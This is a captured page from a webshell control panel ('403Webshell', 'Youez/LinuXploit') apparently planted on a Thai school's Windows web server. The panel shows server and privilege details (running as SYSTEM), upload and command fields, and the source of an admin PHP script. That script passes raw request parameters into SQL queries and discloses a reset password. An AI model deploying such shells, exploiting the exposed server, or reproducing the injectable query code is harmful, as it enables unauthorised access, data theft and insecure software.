403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/ratchaborika/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/ratchaborika/modules/admin/user_schopen.php
<?
CheckAdmin($_SESSION['admin_user'], $_SESSION['admin_pwd']);
?>
<script language="JavaScript">

//******************************************
function checkregis() {
if(document.myform.USERNAME.value=="") {
alert("กรุณากรอกชื่อผู้ใช้ด้วย") ;
document.myform.USERNAME.select() ;
return false ;
}

if(document.myform.NAME.value=="") {
alert("กรุณากรอกชื่อโรงเรียน") ;
document.myform.NAME.select() ;
return false ;
}

if(document.myform.RADAB.value=="") {
alert("กรุณากรอกสังกัด") ;
document.myform.RADAB.select() ;
return false ;
}

//********************************************
}
</script>
	  <table cellspacing="0" cellpadding="0" width="1000" height=500 align="center"   border="0">
        <tbody>
          <tr>
            <td valign="top">
<?
 if($_GET[op] == "minepass_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$_GET[id]."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
		$db->closedb ();

			if(!$_POST[USERNAME] OR !$_POST[NAME]){
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>กรุณากรอกข้อมูลต่างๆให้ครบถ้วน</B></FONT><BR><BR>";
				$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
			}else{
				$User_User = $_GET[id];                     //$_SESSION[admin_user];
				if($_POST[PASSWORD]){
					$NewPass = md5($_POST[PASSWORD]);
					$URLre = "?name=admin&file=user_cpsch";
					//session_unset();
					//session_destroy();
				}else{
					$NewPass = $_POST[oldpass];
					$URLre = "?name=admin&file=user_cpsch";
				}
				
	
				//ทำการแก้ไขข้อมูลลงดาต้าเบส
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_usersch,array(
					"username"=>"$_POST[USERNAME]",
					"password"=>"$NewPass",
					"name"=>"$_POST[NAME]",
					"radab"=>"$_POST[RADAB]",
					"email"=>"$_POST[EMAIL]",
					"level"=>"$_POST[LEVEL]",					
					"address"=>"$_POST[ADDRESS]",
					"status"=>"$_POST[STATUS]",
			    "update_date"=>"".TIMESTAMP.""
//				)," username='$Admin_User' ");
			)," id='$_GET[id]' ");				
				$db->closedb ();
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><A HREF=\"".$URLre."\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>".$arr[usersch][name]." <BR>ชื่อผู้ใช้ : 	".$arr[usersch][username]."<BR>รหัสผ่านใหม่ : 123456</B></FONT><BR><BR>";

				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
		}
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}

?> 
                     </td>
          </tr>
        </tbody>
      </table>

Youez - 2016 - github.com/yon3zu
LinuXploit